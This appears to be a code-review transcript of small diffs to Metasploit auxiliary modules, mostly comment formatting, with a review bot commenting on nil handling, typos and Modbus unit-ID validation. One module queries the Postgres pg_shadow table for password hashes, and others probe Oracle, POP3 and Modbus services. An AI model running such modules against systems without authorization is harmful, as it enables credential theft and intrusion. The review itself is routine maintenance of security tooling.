rescue ::Rex::ConnectionError, ::Errno::EPIPE
print_error("#{ip}:#{rport} unable to connect to the server")
end
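Review bot: `packet = sock.read(100)` followed by `packet.include? "(ERROR_STACK=(ERROR="` raises NoMethodError when the listener closes the connection without sending anything, because `read` returns nil at EOF and the `rescue ::Rex::ConnectionError, ::Errno::EPIPE` below does not cover it; `find_packet = packet.to_s.include?("(ERROR_STACK=(ERROR=")` keeps the check safe. Note also that the absence of an error frame is reported as `is vulnerable`, so until the TODO to `report_vuln` is acted on the result is an indicator rather than a confirmed finding. The enclosing method starts outside the hunk.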


@ -176,7 +176,7 @@ class Metasploit3 < Msf::Auxiliary
end
end
#database links
# database links
res = send_request_raw({
'uri' => '/oradb/PUBLIC/ALL_DB_LINKS',
'version' => '1.1',


@ -74,19 +74,19 @@ class Metasploit3 < Msf::Auxiliary
end
def do_login(user, pass, nsock=self.sock)
#Check if we are already at a logon prompt
# Check if we are already at a logon prompt
res = nsock.get_once(-1,5)
euser = encryption_header(encrypt(user))
nsock.put(euser)
res = nsock.get_once(-1,5)
#See if this knocked a login prompt loose
# See if this knocked a login prompt loose
if pca_at_login?(res)
nsock.put(euser)
res = nsock.get_once(-1,5)
end
#Check if we are now at the password prompt
# Check if we are now at the password prompt
unless res and res.include? "Enter password"
print_error "Problem Sending Login: #{res.inspect}"
return :abort
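Review bot: The comment `# Check if we are already at a logon prompt` above the first `res = nsock.get_once(-1,5)` describes a check the code does not make: the value is read and overwritten two lines later without being inspected, so either that result should feed `pca_at_login?` before the username is sent, or the comment should state what actually happens, e.g. `# Drain whatever the server sent on connect; the prompt is re-detected below`. Each `get_once(-1,5)` can also return nil on timeout; the final `unless res and res.include? "Enter password"` is guarded against that but the earlier reads are not, so `pca_at_login?` presumably has to tolerate nil — worth confirming. The method continues outside the hunk.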


@ -25,7 +25,7 @@ class Metasploit3 < Msf::Auxiliary
def run_host(ip)
begin
res = connect
res = connect
banner = sock.get_once(-1, 30)
banner_sanitized = Rex::Text.to_hex_ascii(banner.to_s)
print_status("#{ip}:#{rport} POP3 #{banner_sanitized}")


@ -73,7 +73,7 @@ class Metasploit3 < Msf::Auxiliary
print_status(" TCP OPEN|FILTERED #{dhost}:#{dport}")
#Add Report
# Add Report
report_note(
:host => dhost,
:proto => 'tcp',


@ -32,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary
def run_host(ip)
#Query the Postgres Shadow table for username and password hashes and report them
# Query the Postgres Shadow table for username and password hashes and report them
res = postgres_query('SELECT usename, passwd FROM pg_shadow',false)
service_data = {
@ -55,7 +55,7 @@ class Metasploit3 < Msf::Auxiliary
credential_data.merge!(service_data)
#Error handling routine here, borrowed heavily from todb
# Error handling routine here, borrowed heavily from todb
case res.keys[0]
when :conn_error
print_error("A Connection Error occured")
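Review bot: The user-facing message `print_error("A Connection Error occured")` misspells *occurred*, and because it carries no target it is hard to attribute when several hosts are scanned; `print_error("#{ip} A connection error occurred")` fixes both, `ip` being the `run_host` parameter visible above. The `case res.keys[0]` dispatch assumes `postgres_query` always returns a one-key Hash; if it can return nil on a failed connection this would raise NoMethodError before the `:conn_error` branch is reached — worth confirming against the mixin. The method continues outside the hunk.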


@ -94,7 +94,7 @@ class Metasploit3 < Msf::Auxiliary
def smart_query(query_string)
res = postgres_query(query_string,false)
#Error handling routine here, borrowed heavily from todb
# Error handling routine here, borrowed heavily from todb
case res.keys[0]
when :conn_error
print_error("A Connection Error occured")
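Review bot: `print_error("A Connection Error occured")` in `smart_query` misspells *occurred*; `print_error("A connection error occurred")`. The same message is duplicated in the Postgres hashdump module's error routine, so both should be corrected together. The case statement and method continue outside the hunk.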


@ -71,7 +71,6 @@ class Metasploit3 < Msf::Auxiliary
end
# Reporting
report_service(
:host => rhost,
:port => rport,
@ -102,7 +101,6 @@ class Metasploit3 < Msf::Auxiliary
end
# Logout
postgres_logout
rescue Rex::ConnectionError


@ -108,8 +108,8 @@ class Metasploit3 < Msf::Auxiliary
# For debugging only.
#rescue ::Exception
# print_error("#{$!}")
# return :abort
# print_error("#{$!}")
#return :abort
ensure
disconnect()


@ -38,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary
end
def run_host(ip)
#read input register=func:04, register 1
# read input register=func:04, register 1
sploit="\x21\x00\x00\x00\x00\x06\x01\x04\x00\x01\x00\x00"
sploit[6] = [datastore['UNIT_ID']].pack("C")
connect()
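Review bot: `sploit[6] = [datastore['UNIT_ID']].pack("C")` silently truncates UNIT_ID modulo 256 because the Modbus unit identifier is a single byte, so a mistyped option such as 300 probes unit 44 without any warning; unless the option is declared with range validation (which the hunk does not show), the value should be checked before the frame is built. The string literal assigned to `sploit` is then mutated in place, which is fine today but will raise under `# frozen_string_literal: true`; `.dup` on the literal avoids that. `run_host` continues outside the hunk.
```ruby
    # Modbus unit identifier is one byte; reject anything pack("C") would wrap
    unit_id = datastore['UNIT_ID'].to_i
    unless (0..255).include?(unit_id)
      print_error("#{ip} UNIT_ID must be between 0 and 255")
      return
    end
    # read input register=func:04, register 1
    sploit = "\x21\x00\x00\x00\x00\x06\x01\x04\x00\x01\x00\x00".dup
    sploit[6] = [unit_id].pack("C")
    # … unchanged: connect() and the rest of run_host …
```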
